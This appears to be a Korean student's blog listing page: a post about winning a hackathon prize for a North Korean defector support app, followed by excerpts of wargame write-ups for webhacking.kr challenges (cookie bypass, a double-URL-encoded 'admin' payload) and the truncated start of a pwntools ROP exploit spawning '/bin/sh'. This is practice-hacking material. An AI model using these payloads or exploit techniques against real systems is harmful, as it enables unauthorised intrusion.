IF해커톤(이유있는 프로젝트) (11월10일~11일) IF해커톤에 참가하여 소셜임팩트상(2위)를 수상하였습니다. 이제 학업에도 조금더 집중하고, 진정으로 하고싶은 분야에 더 집중하기 위해서 마지막이라고 생각하고 나갔던 대회입니다.(물론 현재까지) 저희팀 (엄브렐라)의 이번 프로젝트는 사회문제(새터민적응)에 관한 문제를 주제로 정하여 사전번역(텍스트, ocr, , 음성인식) 으로 구현하고, 새터민들의 인식을 개선하기위해 웹(문화어로 디자인한 제품 판매) 프로젝트를 진행하였습니다,. 모든 팀원들이 도대체 왜 수상을 하였는지 궁금해할 정도로 예상치도 못한 수상이라 놀랐습니다. 해커톤에 참여하신 모든분들(참가자. + 관계자) 수고많으셨습니다. 한국디지털미디어고등학교 : 박재훈, 이승현, 윤효연, 이동준 선린인터..

먼저 사이트를 들어가면 index.phps 로 들어가라고 합니다.들어가면 아래와 같은 코드를 확인할 수 있습니다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546Challenge 24 Colored by Color Scriptercs 코드를보면 12, 7, 0 을 이리저리 바꾸는 것으로 볼 수 있습니다.그러니 그러면 이를 우회하면 되죠?쿠키를 생성합니다. 먼저 삽질좀 하다 대입을 해보니 이런 쿠키를 입력하면 아래와 같이 풀리게 되었습니다(crackup)

적당히 심심할때 풀어보면 좋을만한 문제였습니다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364from pwn import * r = process("./easy_of_the_easy")e = ELF("./easy_of_the_easy")l = e.libcbss = e.bss()+0x16write_got = e.got["write"]read_got = e.got["read"]read_plt = e.plt["read"]write_plt = e.plt["write"]shell = "/bin/sh\x00"pppr = 0x080489e9contex..

이번문제는 약간 삽질했습니다.코드를 자세히보니 인풋에 넣으면 안되고 Auth에 바로 넣으면 되더라고요 ㅎㅎ 먼저 코드는 이렇습니다. 저값을 계산해주는데 한가지 이상한점이 있었습니다. 파이썬의 값은 다음과 같고 console의 값음 다음과 같습니다. 연산 순서의 차이 같은데 ㅎㅎ 신기하네요 ㅎㅎ 이 값들의 /10 값을 넣어줍니다. (crackup)_

엄청 간단하게 푼 문제였습니다.먼저 아무키나 입력하면 아래와 같이 별이 붙습니다. js코드를 확인하면 다음과 같고 아스키 코를 참조하여 124인 "|" 을 클릭합니다 다음과 같은 페이지가 나오고 그대로 auth에 입력합니다.

문제는 아래와 같습니다. 처음에 admin과 같은지 검사를 한 후 그 뒤 urlencording 한 값을 대입함으로 결론적으론 urlencording을 2번 한 후 넣으면 됩니다. payload : http://webhacking.kr/challenge/web/web-11/?no=%2561%2564%256d%2569%256e